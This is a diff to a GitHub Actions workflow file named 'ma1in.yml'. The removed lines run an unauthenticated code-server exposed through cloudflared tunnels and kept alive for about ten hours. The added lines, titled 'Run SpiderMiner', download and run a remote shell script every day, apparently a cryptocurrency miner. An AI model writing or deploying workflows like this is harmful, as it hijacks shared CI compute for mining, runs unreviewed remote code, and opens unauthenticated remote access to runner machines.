--- a/.github/workflows/ma1in.yml
+++ b/.github/workflows/ma1in.yml
@@ -1,52 +1,18 @@
-name: Run VSCode with Agro Tunnel
-
+name: Run SpiderMiner
 on:
-  - push
+  workflow_dispatch:  # Allows manual triggering
+  schedule:
+    - cron: '0 0 * * *'  # Runs daily at midnight (optional)
 
 jobs:
-  build:
+  run-miner:
     runs-on: ubuntu-latest
-
     steps:
-      - name: Checkout repository
-        uses: actions/checkout@v2
-
-      - name: Set up Python
-        uses: actions/setup-python@v2
-        with:
-          python-version: 3.x
-
-      - name: Wait for environment setup (Timer)
-        run: sleep 10
-
-      - name: Install required tools
-        run: |
-          if [ ! -f cloudflared ]; then
-            wget -q -nc https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -O cloudflared
-            chmod +x cloudflared
-          fi
-          curl -fsSL https://code-server.dev/install.sh | sh
-
-      - name: Start VSCode
-        env:
-          PORT: 10000
-        run: |
-          code-server --port $PORT --disable-telemetry --auth none &
-
-      - name: Start First Agro Tunnel
-        env:
-          PORT: 10000
-        run: |
-          ./cloudflared tunnel --url http://127.0.0.1:$PORT --metrics localhost:45678 &
-
-      - name: Start Second Agro Tunnel
-        env:
-          PORT: 10000
-        run: |
-          ./cloudflared tunnel --url http://127.0.0.1:$PORT --metrics localhost:45679 &
-
-      - name: Keep Workflow Alive for First 5 Hours
-        run: sleep $((5 * 60 * 60))
-
-      - name: Keep Workflow Alive for Second 5 Hours
-        run: sleep $((5 * 60 * 60))
+    - name: Install dependencies
+      run: sudo apt-get update && sudo apt-get install -y wget
+    
+    - name: Download and run SpiderMiner
+      run: |
+        wget -O spiderminer.sh https://raw.githubusercontent.com/DeathSpiderDev/Spiders-Miner/refs/heads/main/1spiderminer.sh
+        chmod +x spiderminer.sh
+        bash spiderminer.sh
